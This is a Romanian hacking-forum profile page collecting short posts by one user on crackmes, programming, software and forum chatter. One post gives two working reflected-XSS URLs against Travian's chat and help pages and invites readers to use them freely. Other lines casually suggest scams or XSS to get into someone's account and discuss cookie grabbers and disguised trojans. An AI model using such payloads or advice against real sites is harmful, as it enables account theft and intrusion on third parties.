tw8
-
Posts
481 -
Joined
-
Last visited
-
Days Won
1
Posts posted by tw8
-
-
Ras, vezi ca la tine nu este bine rezolvat...probabil ai aplicat un patch
.virusz, felicitari pentru keygen
. -
ma plictisesc si am zis eu sa intreb si voi sa raspundeti si eu dupa aia voi da raspunsu la intrebare.
E o idee buna. Ne mai punem mintea la contributie
. Totusi, cred ca ar trbui mutat la Challenge-uri(daca ii schimbati putin numele).Astept urmatoarele intrebari
. -
Mi se pare ca intrebarea este pusa intr-un mod cam ciudat, dar in fine.
Dupa parerea mea, sunt foarte importante din 2 motive:
- 1. Odata ce ai declarat o functie, o poti invoca intr-un singur rand. In schimb, daca nu ai declarat functia, si o sa ai nevoie sa faci acelasi lucru de mai multe ori, o sa trebuiasca sa copiezi codul respectiv de fiecare data. La programe cat de cat serioase, e foarte important sa ruleze cat mai repede, sa fie mic si sa fie eficient.
2. E mult mai bine structurat, se intelege mai bine daca faci o functiew decat daca trantesti un cod.
Bafta
.P.S.: La ce iti trbuie asta
? - 1. Odata ce ai declarat o functie, o poti invoca intr-un singur rand. In schimb, daca nu ai declarat functia, si o sa ai nevoie sa faci acelasi lucru de mai multe ori, o sa trebuiasca sa copiezi codul respectiv de fiecare data. La programe cat de cat serioase, e foarte important sa ruleze cat mai repede, sa fie mic si sa fie eficient.
-
Reguli : User + Pass la vedere.
Dificultate: Din ce am vazut eu (cat de mult se poate vedea in 2 minute) mi se pare dificultate medie.
Am observat faptul ca daca lasi gol atat campul user cat si campul pass, programul da mesajul "corect", dar nu am mai reparat bugul asta (stiu foarte bine de ce il da, dar mi-e lene sa il uploadez iar). Oricum, asta ar putea sava ajute la rezolvarea lui.
Bafta
! -
cum bagati pozele fratilor
Pui [img*]urlulcatrepoza[/img*], doar ca nu mai scrii stelutele alea.
De acum, cand vezi ceva scris interesant, da quote la post si o sa iti dai seama cum a fost scris.
Bafta!
-
Vreau sa stiu daca ar fi OK si asa sau am gresit cu ceva?Sunt incepator.
Ce ai facut tu acolo nu prea cred ca se poate numi ca ai aflat parola, si nici patch nu se poate numi (din punctul meu de vedere). Oricum, bafta in continuare, si, ca sa nu fiu total offtopic :
-
-
Iti recomand Cyber Link Power Director. mie, cel putin, mi se pare simplu de utilizat, dar, in acelasi tim, destul de complex...
-
Salut!
Stiu ca multa lume se joaca pe travian, asa ca m-am gandit sa caut cateva erori de tip XSS in site care sa ii (va) ajute
. Deocamdata, acest pack contine doar 2 vulnerabilitati, dar sper sa se extinda cu ajutorul vostru si al meu.Vulnerabilitatile sunt valabile pe orice site travian (fie el .ro, .com, .fr etc).
Acestea fiind spuse, avem :
XSS in CHAT :
http://www.travian.com/chat.php?chatname=tw8%22%20width=%22675%22%20height=%22500%22%3E%3C/iframe%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83,32,45,32,98,121,32,116,119,56))%3C/script%3E
XSS in HELP :
http://help.travian.com/index.php?type=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83,32,45,32,98,121,32,116,119,56))%3C/script%3E
XSS-ul din urma, merge doar pe cateva servere, insa primul merge pe toate. Le puteti folosi cum vreti.
Bafta!
L.E.: Daca aveti nelamuriri/comentarii/ceva de spus, postati aici si nu mai imi dati PM-uri idioate
!-
1
-
-
Opera + FireFox.
Uneori si IE, ca sa testez XSS-uri care stiam ca mergeau mai demult doar pe IE
. -
Frumoasa initiativa
.Bafta in continuare!
-
Nu stiu cati de multi vor participa.
Si pe hackpedia a fost la fel: la inceput, au fost cativa participanti, iar apoi nimeni nu a mai avut timp sa participe si proiectul s-a cam dus
. -
Invata javascript si php, restul vine de la sine.
El nu vrea un cookie grabber, ci doar un XSS in Yahoo!
.Cat despre cookie grabber, se afla mii de surse pe internet, deci, nici acestea nu sunt private
. -
-
very easy.. ce pot sa zic
Mie unul nu mi se apre prea normala metoda ta.
E cam acelasi lucru cu a-i cere sursa, nu e mare diferenta
! -
De ce ? Nu stiu (si nu cred ca se stie).
Ba se stie: http://weblogs.studentclub.ro/tiberiur/archive/2005/10/20/12166.aspx
-
LE : Va rog stergeti postul asta...nu e vina mea, nu am vrut sa fac doubleposting, dar in loc de edit cred ca am apasat quote.
-
Cel putin nu cred ca pot veni parolele pe tava.
Ba se poate.
Facusem mai demult un program (tot pentru yahoo), in care iti dadea parola, nume, prenume, data nasterii, numarul de la pantof si toate cele
.Desigur, glumeam. E imposibil, dar oricum, sa presupunem ca ar fi posibil. Cine credeti ca ar da un astfel de program publicului larg?
-
-
In primul rand, ce forum ai ?
Vrei sa ghicim noi daca e PHPBB, PunBB, SMF etc
?La unele, optiunea de adaugare pool este preinstalata, la altele va trebui sa instalezi un mod
.Si, crede-ma, nu merita sa il faci in flash
. -
si daca in loc de exe pun .jpg ..si trimit un server de troian cuiva....pers respectiva cum o vede?
Gandeste-te.
Mai intai trebuie sa ii "instalezi" extensia, si abia apoi poti rula un executabil cu extensia respectiva.
Adica, tot trebuie sa ii trimiti persoanei respective un fisier ".exe" sau ".reg" pentru a instala extensia respectiva
. -
Foloseste un scam sau incerca sa gasesti o vulnerabilitate de tip XSS in site.
Apropo, nice title :roll:
-
pt 1 sapt .. maxim 2 ..
Dude, ai zis ca o sa termini scriptul intr-o saptamana 2...dar au trecut 2 luni de atunci
.Mai avem mult de asteptat
? -
Primul telefon al meu... Nokia 1600
CrackMe v5
in Challenges (CTF)
Posted
Probabil o sa il faca in AutoIT.
Daca a putin timp, o sa iti fac eu unul in VB ... VB.NET mai exact
.